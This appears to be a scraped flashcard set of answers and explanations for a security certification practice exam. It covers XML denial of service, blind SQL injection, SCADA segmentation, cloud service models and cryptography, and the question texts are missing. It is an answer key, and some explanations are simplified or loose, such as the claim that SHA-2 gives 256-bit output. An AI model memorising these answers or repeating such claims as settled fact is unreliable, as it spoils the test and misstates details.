OBJ-5.1: An XML denial of service (or XML bomb) attempts to pull in entities recursively in a defined DTD and explode the amount of memory used by the system until a denial of service condition occurs. Service-Oriented Architecture (SOA) is an architectural paradigm, and it aims to achieve a loose coupling amongst interacting distributed systems. SOA is used by enterprises to efficiently and cost-effectively integrate heterogeneous systems. However, SOA is affected by several security vulnerabilities, affecting the speed of its deployment in organizations. SOA is most commonly vulnerable to an XML denial of service. While the other options could be used as part of an attack on SOAP, the SOAP message itself is formatted as an XML document making an XML denial of service the most common vulnerability. While SOAP requests are vulnerable to SQL injections, this occurs by submitting a parameter as a morphed SQL query that can authenticate or reveal sensitive information as an attack on the underlying SQL. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. XPath Injections operate on web sites that use user-supplied information to construct an XPath query for XML data.

Answer 102

A

D. An attacker cannot see any of the display errors with information about the injection during a blind attack
Explanation
OBJ-5.3: Blind SQL injection is a type of SQL injection attack that asks the database true or false questions and determines the answer based on the application’s response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.

Answer 103

A

D. Update the anti-malware solution
Explanation
OBJ-7.2: Since the workstation is isolated from the internet, the anti-malware solution will need to be manually updated to ensure it has the latest virus definitions. Without the latest virus definitions, the system can easily become reinfected.

Answer 104

A

A. There is minimal risk being assumed since the cellular modem is configured for outbound connections only
Explanation
OBJ-7.2: There is minimal risk being assumed in this scenario since the cellular modem is configured for outbound connections only. This also minimizes the risk of an attacker gaining remote access to the generator. The generator is logically and physically isolated from the rest of the enterprise network, so even if an attacker could exploit the generator, they could not pivot into the production network. While there is a risk of the manufacturer using the data for purposes other than originally agreed upon, this is a minimal risk due to the manufacturer’s data minimization procedures and the type of data collected. Should the manufacturer choose to use usage statistics about the generator for some other purpose, it would have a negligible impact on the company since it does not contain any PII or proprietary company data.

Answer 105

A

A. Implement a VLAN to separate the HVAC control system from the open wireless network
Explanation
OBJ-7.2: A VLAN is useful to segment out network traffic to various parts of the network and stop someone from the open wireless network from logging to the HVAC controls. By utilizing NAC, each machine connected to the open wireless network could be checked for compliance and determine if it is a ‘known’ machine, but they would still be given access to the entire network. Also, since this is a publicly usable network, using NAC could prevent users from accessing all the network features. An IDS would be a good solution to detect the attempted logins, but it won’t prevent them. Instead, an IPS would be required to prevent logins.

Answer 106

A

C. Metasploit
Explanation
OBJ-7.2: Metasploit is an open-source exploitation framework that uses plugins to add different exploits and functionalities. They are always in the form of a directory structure, like /exploit/windows/scada/daq_factory_bof. This represents the plugin type (exploit), the operating system involved (windows), the service/program (scada), and the specific exploit (daq_factory_bof). If you see this format in a question, the answer is most likely Metasploit related.

Answer 107

A

B. BYOD
D. MDM
Explanation
OBJ-7.1: The Bring Your Own Device (BYOD) policy is a security framework used to facilitate the use of personally-owned devices to access corporate networks and data. Mobile Device Management (MDM) is a class of management software designed to apply security policies to the use of mobile devices in the enterprise. Since the employees will be using their own laptops and smartphones, the company will need a good BYOD policy to provide security guidance. The company may also implement and install MDM across the employee’s devices to better secure the BYOD devices if they give the company permission.

Answer 108

A

A. Intrusion prevention system
Explanation
OBJ-7.2: Since this question is focused on the ICS/SCADA network, the best solution would be implementing an Intrusion Prevention System. ICS/SCADA machines utilize very specific commands to control the equipment and to prevent malicious activity. You could set up strict IPS rules to prevent unknown types of actions from being allowed to occur. Log consolidation is a good idea, but it won’t prevent an issue and therefore isn’t the most critical thing to add first. Automated patch management should not be conducted, as ICS/SCADA systems must be tested before conducting any patches. Often, patches will break ICS/SCADA functionality. Anti-virus software may or may not be able to run on the equipment, as well, since some ICS/SCADA systems often do not rely on standard operating systems like Windows.

Answer 109

A

D. Laptop.
Explanation
OBJ-7.2: Supervisory control and data acquisition (SCADA) systems, industrial control systems (ICS), internet-connected televisions, thermostats, and many other things examples of devices classified as the Internet of Things (IoT). A laptop would be better classified as a computer or host than part of the Internet of Things. The Internet of things (IoT) is a system of interrelated computing devices, mechanical and digital machines provided with unique identifiers (UIDs), and the ability to transfer data over a network without requiring human-to-human or human-to-computer interaction.

Answer 110

A

C. Removable media
Explanation
OBJ-7.2: Airgaps are designed to remove connections between two networks to create a physical segmentation between them. The only way to cross an airgap is to have a physical device between these systems, such as using a removable media device to transfer files between them. A directory traversal is an HTTP attack that allows attackers to access restricted directories and execute commands outside of the web server’s root directory. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. A session hijacking attack compromises the session token by stealing or predicting a valid session token to gain unauthorized access to the Web Server. A directory traversal, cross-site scripting, or session hijacking attack cannot by itself cross an airgap.

Answer 111

A

D. Containerization
Explanation
OBJ-7.1: Containerization is the logical isolation of enterprise data from personal data while co-existing in the same device. The major benefit of containerization is that administrators can only control work profiles that are kept separate from the user’s personal accounts, apps, and data. This technology basically creates a secure vault for your corporate information. Highly targeted remote wiping is supported with most container-based solutions.
Question 112:

Answer 112

A

B. Cloud services
Explanation
OBJ-8.1: The on-demand nature of cloud services means that instances are often created and destroyed again, with no real opportunity for forensic recovery of any data. Cloud providers can mitigate this to some extent by using extensive logging and monitoring options. A CSP might also provide an option to generate a file system and memory snapshots from containers and VMs in response to an alert condition generated by a SIEM. Employee workstations are often the easiest to conduct forensics on since they are a single-user environment for the most part. Mobile devices have some unique challenges due to their operating systems, but good forensic tool suites are available to ease the forensic acquisition and analysis of mobile devices. On-premise servers are more challenging than a workstation to analyze, but they do not suffer from the same issues as cloud-based services and servers.

Answer 113

A

B. Private
Explanation
OBJ-8.1: Private cloud refers to a cloud computing model where IT services are provisioned over private IT infrastructure for the dedicated use of a single organization. A private cloud is usually managed via internal resources. The terms private cloud and virtual private cloud (VPC) are often used interchangeably.

Answer 114

A

A. Protection of endpoint security
C. Dependency on the cloud service provider
D. Limited disaster recovery options
Explanation
OBJ-8.1: Serverless is a modern design pattern for service delivery. With serverless, all the architecture is hosted within a cloud, but unlike “traditional” virtual private cloud (VPC) offerings, services such as authentication, web applications, and communications aren’t developed and managed as applications running on servers located within the cloud. Instead, the applications are developed as functions and microservices, each interacting with other functions to facilitate client requests. There is a heavy dependency on the cloud service provider in a serverless architecture system since all of the back-end infrastructure’s patching and management functions are done by them. An organization using such an architecture would still need to prevent compromise of the user endpoints, though the cloud service provider does not manage these. Another concern with serverless architectures is that there are limited options for disaster recovery if service provisioning fails. Patching of backend infrastructure is eliminated because the infrastructure is eliminated with serverless architectures. Once migration is complete, there are no physical servers to manage, which reduces the workload on your system administration teams.

Answer 115

A

B. Utilize vendor testing and audits
Explanation
OBJ-8.1: The best option is to utilize vendor testing and audits in a cloud-based environment. Most SaaS providers will not allow customers to conduct their own port scans or vulnerability scans against the SaaS service. This means you cannot scan using a VPN connection, utilize different scanning tools, or hire a third-party contractor to scan on your behalf.

Answer 116

A

A. PaaS
Explanation
OBJ-8.1: Platform as a service (PaaS) is a complete development and deployment environment in the cloud, with resources that enable you to deliver everything from simple cloud-based apps to sophisticated, cloud-enabled enterprise applications. You purchase the resources you need from a cloud service provider on a pay-as-you-go basis and access them over a secure Internet connection. PaaS includes infrastructure (servers, storage, and networking) and middleware, development tools, business intelligence (BI) services, database management systems, and more. PaaS allows you to avoid the expense and complexity of buying and managing software licenses, the underlying application infrastructure and middleware, container orchestrators, or the development tools and other resources. You manage the applications and services you develop, and the cloud service provider typically manages everything else.

Answer 117

A

B. VM escape
Explanation
OBJ-8.1: VM escape refers to malware running on a guest OS jumping to another guest or the host. As with any other software type, it is vital to keep the hypervisor code up-to-date with patches for critical vulnerabilities. VM escape is the biggest threat to virtualized systems.

Answer 118

A

A. PaaS
Explanation
OBJ-8.1: Platform as a Service (PaaS) provides the end-user with a development environment without all the hassle of configuring and installing it themselves. If you want to develop a customized or specialized program, PaaS helps reduce the development time and overall costs by providing a ready to use platform.

Answer 119

A

A. MD-5
Explanation
OBJ-9.1: MD-5 creates a 128-bit fixed output. SHA-1 creates a 160-bit fixed output. SHA-2 creates a 256-bit fixed output. RIPEMD creates a 160-bit fixed output.

Answer 120

A

B. 802.1x using EAP with MSCHAPv2
Explanation
OBJ-9.1: Since the backend uses a RADIUS server for back-end authentication, the network administrator can install 802.1x using EAP with MSCHAPv2 for authentication.

Answer 121

A

C. Diffie-Hellman
Explanation
OBJ-9.1: The Diffie-Hellman (DH) is used to exchange cryptographic keys over a public channel securely and was one of the first public-key protocols. As a public-key protocol, it relies on an asymmetric algorithm. AES, RC4, and Blowfish are all symmetric algorithms.

Answer 122

A

A. Steganography was used to hide the leaked data inside the user’s photos
Explanation
OBJ-9.1: The most likely explanation is that the user utilized steganography to hide the leaked data inside their trip photos. Steganography is the process of hiding one message inside another. By hiding the customer’s information within the digital photos, the incident response team would not see the data being hidden without knowing to look for it inside the seemingly benign pictures from the trip. The scenario did not mention whether or not the user connected to the corporate VPN from their home, and the company should log all VPN connections, so this is not the correct answer. Additionally, the user could not hash the data and email it to themselves without losing the information since hashes are a one-way algorithm. Therefore, even if the user had the hash value, they still would not have the customers’ personal information. Finally, according to the scenario, the user’s email showed no evidence of encrypted files being sent.

Answer 123

A

A. Smart card
Explanation
OBJ-9.1: A smart card is used in applications that need to protect personal information and/or deliver fast, secure transactions, such as transit fare payment cards, government, and corporate identification cards, documents such as electronic passports and visas, and financial payment cards. Often, smart cards are used as part of a multifactor authentication system where the smart card and a PIN needs to be entered for system authentication to occur.

Answer 124

A

D. Randomized one-time use pad
Explanation
OBJ-9.1: The only truly unbreakable encryption is one that uses a one-time use pad. This ensures that every message is encrypted with a different shared key that only the two owners of the one-time use pad would know. This technique ensures that there is no pattern in the key for an attacker to guess or find. Even if one of the messages could be broken, all of the other messages would remain secure since they use different keys to encrypt them. Unfortunately, one-time use pads require that two identical copies of the pad are produced and distributed securely before they can be used. DES and AES both rely on a single shared secret key, making it vulnerable to attack. DES has already been broken, while AES remains unbroken (today). With enough time and computing power, though, an AES key could be discovered. RSA is also vulnerable to attack with enough time and computing power.

Answer 125

A

B. MD5 or SHA1 hash digest of the file
Explanation
OBJ-9.1: Keith should conduct a hash of the downloaded file and compare it against the MD5 hash digest listed on the server of this file. This file needs to be a verifiable MD5 hash file to validate the file integrity has not been compromised during the download. This is an important step to ensure the file was not modified in transit during the download. The other options are insufficient to guarantee the integrity of the downloaded file since integrity checking relies on comparing hash digests. A public or private key would not be assigned solely to a single file, nor do they provide integrity on their own. Public and private keys are used to ensure data confidentiality, whereas a hash digest ensures integrity. The file size and file creation date are additional forms of metadata that could help validate a file’s integrity. Still, they of a much lower quality and trust factor than using a hash digest. Therefore MD5 or SHA1 is a better choice.

Brainscape's Knowledge GenomeTM

practice exam 3 Flashcards

Brainscape's Knowledge Genome^TM